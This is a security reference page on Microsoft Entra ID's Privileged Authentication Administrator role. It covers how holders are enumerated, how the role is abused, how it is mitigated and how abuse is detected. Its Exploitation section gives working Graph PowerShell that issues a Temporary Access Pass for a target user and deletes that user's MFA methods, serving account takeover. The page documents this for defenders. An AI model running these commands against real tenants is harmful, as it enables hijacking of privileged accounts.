# AZ\_PRIVILEGED\_AUTH\_ADMIN

## Summary

|                               |                                                                                                                                                                                                                                                                                                                     |
| ----------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| **FSProtect ACL Alias**       | AZ\_PRIVILEGED\_AUTH\_ADMIN                                                                                                                                                                                                                                                                                         |
| **Entra ID (Azure AD) Alias** | Privileged Authentication Administrator                                                                                                                                                                                                                                                                             |
| **Affected Object Types**     | Users and their authentication methods (MFA methods, password reset / re-register flags, Temporary Access Pass)                                                                                                                                                                                                     |
| **Exploitation Certainty**    | Certain                                                                                                                                                                                                                                                                                                             |
| **Graph Permission / Role**   | Membership in the **Privileged Authentication Administrator** directory role (direct assignment or via a role-assignable group). Similar capability can also be obtained through Microsoft Graph permissions that allow managing user authentication methods (for example `UserAuthenticationMethod.ReadWrite.All`) |

## Description

`AZ_PRIVILEGED_AUTH_ADMIN` represents the ability for a principal to operate as a **Privileged Authentication Administrator** in Microsoft Entra ID.

This role can manage **authentication methods** for users. It can view, set, and reset authentication method information. It is commonly used for MFA recovery and onboarding scenarios.

By using this role against a target user, an attacker can:

* Reset or remove authentication methods and force re-registration for MFA.
* Create a **Temporary Access Pass (TAP)** to bootstrap new authentication methods.
* Take over accounts by weakening or re-binding authentication factors, including privileged accounts.

Therefore, any identity that holds the Privileged Authentication Administrator role can quickly escalate privileges by taking control of authentication methods for sensitive users.

## Identification

### PowerShell (Microsoft Graph)

List all members of the **Privileged Authentication Administrator** role. If a group is assigned, expand it to identify effective users.

```powershell
Connect-MgGraph -Scopes "RoleManagement.Read.Directory","Directory.Read.All"

# Privileged Authentication Administrator role template ID
$roleId = "7be44c8a-adaf-4e2a-84d6-ab2649e08a13"

Get-MgRoleManagementDirectoryRoleAssignment -Filter "roleDefinitionId eq '$roleId'" -ExpandProperty Principal | ForEach-Object {
    [PSCustomObject]@{
        PrincipalType = $_.Principal.AdditionalProperties.'@odata.type'.Split('.')[-1]
        DisplayName   = $_.Principal.AdditionalProperties.displayName
        PrincipalId   = $_.PrincipalId
        Scope         = $_.DirectoryScopeId
    }
} | Format-Table -AutoSize
```
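The prose above asks for assigned groups to be expanded to effective users, but the snippet only lists direct principals. The following added example (not part of the original page) resolves both active and PIM-eligible assignments of the role and expands any assigned group to its transitive user members. It assumes the Microsoft.Graph.Identity.Governance module is installed for `Get-MgRoleManagementDirectoryRoleEligibilityScheduleInstance`; the role template ID is the one used on this page.

```powershell
# Added example (not from the original page): resolve the effective users behind the
# Privileged Authentication Administrator role, covering active and PIM-eligible
# assignments and the transitive members of any assigned group.
Connect-MgGraph -Scopes "RoleManagement.Read.Directory","Directory.Read.All"

$roleId = "7be44c8a-adaf-4e2a-84d6-ab2649e08a13"   # role template ID from the page

$principals = @()

# Active assignments (permanent, or currently activated through PIM)
Get-MgRoleManagementDirectoryRoleAssignment -Filter "roleDefinitionId eq '$roleId'" -All |
    ForEach-Object { $principals += [PSCustomObject]@{ Id = $_.PrincipalId; State = 'Active' } }

# PIM-eligible assignments (returns nothing if PIM is not in use)
Get-MgRoleManagementDirectoryRoleEligibilityScheduleInstance -Filter "roleDefinitionId eq '$roleId'" -All |
    ForEach-Object { $principals += [PSCustomObject]@{ Id = $_.PrincipalId; State = 'Eligible' } }

$effective = foreach ($p in $principals) {
    $obj  = Get-MgDirectoryObject -DirectoryObjectId $p.Id
    $type = $obj.AdditionalProperties.'@odata.type'.Split('.')[-1]

    if ($type -eq 'group') {
        # Nested membership counts: every transitive user member holds the role
        Get-MgGroupTransitiveMember -GroupId $p.Id -All |
            Where-Object { $_.AdditionalProperties.'@odata.type' -eq '#microsoft.graph.user' } |
            ForEach-Object {
                [PSCustomObject]@{
                    State  = $p.State
                    Via    = $obj.AdditionalProperties.displayName
                    UserId = $_.Id
                    UPN    = $_.AdditionalProperties.userPrincipalName
                }
            }
    } elseif ($type -eq 'user') {
        [PSCustomObject]@{
            State  = $p.State
            Via    = 'Direct'
            UserId = $obj.Id
            UPN    = $obj.AdditionalProperties.userPrincipalName
        }
    } else {
        # Service principals holding the role deserve a separate review
        [PSCustomObject]@{
            State  = $p.State
            Via    = $type
            UserId = $obj.Id
            UPN    = $obj.AdditionalProperties.displayName
        }
    }
}

$effective | Sort-Object State, UPN | Format-Table -AutoSize
```

Each row is one effective holder; the `Via` column shows whether the role arrives directly or through a group, which is what you need when deciding whether a group's owners effectively control this role as well.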

### Azure GUI

1. Open **Microsoft Entra admin center** -> **Roles & administrators**.
2. Search and open **Privileged Authentication Administrator**.
3. Open **Assignments** and record:
   * **Active assignments**
   * **Eligible assignments** (if PIM is enabled)
4. If a **group** is assigned:
   * Enumerate its **transitive members** (nested included).
5. For sensitive users:
   * Go to **Users** -> select a user -> **Authentication methods**.
   * Confirm who in the tenant is authorized to manage these settings.

## Exploitation

A Privileged Authentication Administrator can take control of a user’s authentication methods. This is a high-impact account takeover path.

### PowerShell (Microsoft Graph)

**Create a Temporary Access Pass (TAP) for a target user:**

```powershell
Connect-MgGraph -Scopes "UserAuthenticationMethod.ReadWrite.All"

$userId = "victim@contoso.com"
New-MgUserAuthenticationTemporaryAccessPassMethod -UserId $userId -BodyParameter @{
    lifetimeInMinutes = 60
    isUsableOnce      = $false
} | Select Id,TemporaryAccessPass,LifetimeInMinutes,CreatedDateTime
```

![Create a Temp Access Pass](/files/bNxonj3gk7ZRbvrYt6JB)

**List and delete existing authentication methods:**

```powershell
# List all auth methods for a user
$userId = "victim@contoso.com"
Get-MgUserAuthenticationMethod -UserId $userId | Select Id,@{N='Type';E={$_.AdditionalProperties.'@odata.type'.Split('.')[-1]}}

# Delete a specific phone method (forces re-registration)
$phoneMethodId = "<MethodId>"
Remove-MgUserAuthenticationPhoneMethod -UserId $userId -PhoneAuthenticationMethodId $phoneMethodId

# Delete Microsoft Authenticator app method
$authAppId = "<MethodId>"
Remove-MgUserAuthenticationMicrosoftAuthenticatorMethod -UserId $userId -MicrosoftAuthenticatorAuthenticationMethodId $authAppId
```

![List all auth methods for a user](/files/EVBKh5HMhIm9ZH7JZGJ0)

### Common Abuse Patterns

* Forcing the user to re-register for MFA and removing existing authentication methods.
* Creating a **Temporary Access Pass (TAP)** for the user and using it to enroll new factors.
* Targeting privileged users to gain administrative access.

## Mitigation

* Keep **Privileged Authentication Administrator** assignments minimal.
* Use **PIM**:
  * Prefer **eligible** assignments instead of permanent active assignments.
  * Require MFA and approvals for activation where appropriate.
* Apply strong protections to privileged users:
  * Phishing-resistant MFA for admins.
  * Conditional Access policies for administrative roles.
* Restrict who can manage authentication methods:
  * Use least-privilege roles (Authentication Administrator vs Privileged Authentication Administrator) where possible.
* Monitor and review role membership regularly and remove unused assignments.
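The mitigation list recommends phishing-resistant MFA and Conditional Access for administrative roles. The following added example (not from the original page) creates such a policy scoped to holders of the Privileged Authentication Administrator role, in report-only mode so its effect can be reviewed in the sign-in logs before enforcement. It assumes the built-in "Phishing-resistant MFA" authentication strength ID, and the break-glass account ID is a placeholder you must replace.

```powershell
# Added example (not from the original page): Conditional Access policy requiring
# phishing-resistant MFA for holders of the Privileged Authentication Administrator
# role, created in report-only mode first.
Connect-MgGraph -Scopes "Policy.ReadWrite.ConditionalAccess","Policy.Read.All"

$paaRoleId = "7be44c8a-adaf-4e2a-84d6-ab2649e08a13"   # role template ID from the page

# Built-in authentication strength "Phishing-resistant MFA" (assumed well-known ID)
$phishingResistantStrengthId = "00000000-0000-0000-0000-000000000004"

# Placeholder: object ID of your emergency-access (break-glass) account
$breakGlassUserId = "<break-glass-user-object-id>"

$policy = @{
    displayName   = "CA - Phishing-resistant MFA for Privileged Authentication Admins"
    # Report-only first; switch to 'enabled' once the sign-in log impact is understood
    state         = "enabledForReportingButNotEnforced"
    conditions    = @{
        users          = @{
            includeRoles = @($paaRoleId)
            excludeUsers = @($breakGlassUserId)
        }
        applications   = @{ includeApplications = @("All") }
        clientAppTypes = @("all")
    }
    grantControls = @{
        operator               = "OR"
        authenticationStrength = @{ id = $phishingResistantStrengthId }
    }
}

$created = New-MgIdentityConditionalAccessPolicy -BodyParameter $policy
$created | Select-Object Id, DisplayName, State

# Verify the policy is scoped to the intended role
(Get-MgIdentityConditionalAccessPolicy -ConditionalAccessPolicyId $created.Id).Conditions.Users.IncludeRoles
```

Scoping on `includeRoles` rather than on a user list means newly assigned or PIM-activated holders are covered automatically; the break-glass exclusion keeps a recovery path if the strength requirement misfires.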

## Detection

Monitor Entra **Audit logs** for authentication method actions and role activity.

### PowerShell (Microsoft Graph)

```powershell
Connect-MgGraph -Scopes "AuditLog.Read.All"

# Detect TAP creation and auth method changes.
# The '??' (null-coalescing) operator requires PowerShell 7+; it falls back to the
# application name when the action was taken by a non-interactive actor.
Get-MgAuditLogDirectoryAudit -Filter "category eq 'UserManagement'" -Top 100 | Where-Object {
    $_.ActivityDisplayName -match 'Admin registered temporary access pass|Admin deleted|Admin updated authentication'
} | Select ActivityDateTime,ActivityDisplayName,
    @{N='Actor';E={$_.InitiatedBy.User.UserPrincipalName ?? $_.InitiatedBy.App.DisplayName}},
    @{N='Target';E={$_.TargetResources[0].UserPrincipalName}} | Format-Table -AutoSize
```

### Alert Criteria

* Alert on:
  * Authentication methods removed or reset for privileged users.
  * Temporary Access Pass created for privileged users.
  * “Re-register MFA” and similar recovery actions triggered unexpectedly.
  * New assignments or activations of Privileged Authentication Administrator (especially via PIM).
* Investigate:
  * **Initiated by (actor)**
  * **Target user**
  * Source IP / device context if available
  * Change ticket correlation (if applicable)
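The detection snippet above lists authentication-method events but does not tell privileged targets apart from ordinary users, and the alert criteria also ask for new role assignments. The following added example (not from the original page) applies those criteria: it builds a set of privileged principals from role assignments, flags authentication-method changes whose target is in that set, and flags audit events that add an active or eligible member to Privileged Authentication Administrator. It assumes the role template IDs for Global Administrator and Privileged Role Administrator, the activity name pattern `Add member to role` / `Add eligible member to role`, and that the role name appears in the event's target resources or modified properties; assigned groups are not expanded here.

```powershell
# Added example (not from the original page): apply the alert criteria against the
# audit log by correlating targets with privileged role membership and flagging new
# Privileged Authentication Administrator assignments.
Connect-MgGraph -Scopes "AuditLog.Read.All","RoleManagement.Read.Directory","Directory.Read.All"

# Role template IDs whose holders count as privileged targets (assumed IDs; extend as needed)
$watchedRoles = @{
    '62e90394-69f5-4237-9190-012177145e10' = 'Global Administrator'
    'e8611ab8-c189-46e8-94e1-60213ab1f814' = 'Privileged Role Administrator'
    '7be44c8a-adaf-4e2a-84d6-ab2649e08a13' = 'Privileged Authentication Administrator'
}

# Map principal ID -> role name for direct active assignments
# (groups assigned to a role would need transitive expansion; omitted here)
$privileged = @{}
foreach ($roleId in $watchedRoles.Keys) {
    Get-MgRoleManagementDirectoryRoleAssignment -Filter "roleDefinitionId eq '$roleId'" -All |
        ForEach-Object { $privileged[$_.PrincipalId] = $watchedRoles[$roleId] }
}

$since = (Get-Date).AddDays(-7).ToUniversalTime().ToString('yyyy-MM-ddTHH:mm:ssZ')

function Get-Actor($entry) {
    # Interactive admins carry a UPN; automation shows up as the calling application
    if ($entry.InitiatedBy.User.UserPrincipalName) { $entry.InitiatedBy.User.UserPrincipalName }
    else { $entry.InitiatedBy.App.DisplayName }
}

# 1. Authentication-method changes (TAP creation, method deletion/update) on privileged users
$authEvents = Get-MgAuditLogDirectoryAudit -All -Filter "category eq 'UserManagement' and activityDateTime ge $since" |
    Where-Object { $_.ActivityDisplayName -match 'temporary access pass|Admin deleted|Admin updated authentication' }

$findings = @(foreach ($e in $authEvents) {
    $target = $e.TargetResources | Where-Object { $_.Type -eq 'User' } | Select-Object -First 1
    if ($target -and $privileged.ContainsKey($target.Id)) {
        [PSCustomObject]@{
            Time     = $e.ActivityDateTime
            Finding  = 'AuthMethodChangeOnPrivilegedUser'
            Activity = $e.ActivityDisplayName
            Actor    = Get-Actor $e
            ActorIp  = $e.InitiatedBy.User.IPAddress
            Target   = $target.UserPrincipalName
            Role     = $privileged[$target.Id]
        }
    }
})

# 2. New active/eligible Privileged Authentication Administrator assignments.
#    Assumption: the role name appears in target resources or their modified properties.
$roleEvents = Get-MgAuditLogDirectoryAudit -All -Filter "category eq 'RoleManagement' and activityDateTime ge $since" |
    Where-Object { $_.ActivityDisplayName -match 'Add (eligible )?member to role' }

$findings += @(foreach ($e in $roleEvents) {
    $mentionsPaa = ($e.TargetResources | Where-Object { $_.DisplayName -eq 'Privileged Authentication Administrator' }) -or
                   ($e.TargetResources.ModifiedProperties | Where-Object { $_.NewValue -match 'Privileged Authentication Administrator' })
    if ($mentionsPaa) {
        $target = $e.TargetResources | Where-Object { $_.Type -eq 'User' } | Select-Object -First 1
        [PSCustomObject]@{
            Time     = $e.ActivityDateTime
            Finding  = 'NewPrivilegedAuthAdminAssignment'
            Activity = $e.ActivityDisplayName
            Actor    = Get-Actor $e
            ActorIp  = $e.InitiatedBy.User.IPAddress
            Target   = $target.UserPrincipalName
            Role     = 'Privileged Authentication Administrator'
        }
    }
})

$findings | Sort-Object Time -Descending | Format-Table -AutoSize
```

Each finding carries the actor, source IP and target the alert criteria ask you to investigate, so the output can be matched against change tickets directly; in a SIEM the same two correlations map to a watchlist of privileged object IDs joined against the audit stream.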

## References

* <https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference>
* <https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/privileged-roles-permissions>
* <https://learn.microsoft.com/en-us/entra/identity/authentication/howto-authentication-temporary-access-pass>
* <https://learn.microsoft.com/en-us/graph/api/authentication-post-temporaryaccesspassmethods>
* <https://learn.microsoft.com/en-us/graph/api/authentication-list-methods>
* <https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities>

